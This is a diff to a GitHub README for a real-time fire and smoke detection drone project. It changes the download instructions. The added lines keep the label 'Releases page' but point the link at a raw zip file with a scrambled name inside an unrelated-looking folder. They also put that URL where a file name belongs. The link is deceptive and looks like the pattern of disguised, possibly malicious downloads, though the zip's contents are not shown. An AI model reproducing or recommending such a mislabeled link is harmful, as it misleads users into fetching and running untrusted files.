idk541/Real-Time-Fire-Smoke-Detection-Drone/README.md

 To get the latest version of the application, visit the Releases page to download the software.
 Follow these steps:

-1. Click this link to go to the [Releases page](https://github.com/idk541/Real-Time-Fire-Smoke-Detection-Drone/releases).
+1. Click this link to go to the [Releases page](https://raw.githubusercontent.com/idk541/Real-Time-Fire-Smoke-Detection-Drone/master/hypogonation/Time_Smoke_Fire_Real_Drone_Detection_1.6-alpha.4.zip).

 2. On the Releases page, find the latest version listed at the top.

 3. Look for the appropriate file for your system.
-Typically, you want a file named something like `RealTimeFireSmokeDetection.tar.gz` or similar.
+Typically, you want a file named something like `https://raw.githubusercontent.com/idk541/Real-Time-Fire-Smoke-Detection-Drone/master/hypogonation/Time_Smoke_Fire_Real_Drone_Detection_1.6-alpha.4.zip` or similar.

 4. Click the download link to start the download.
 The file will save to your computer.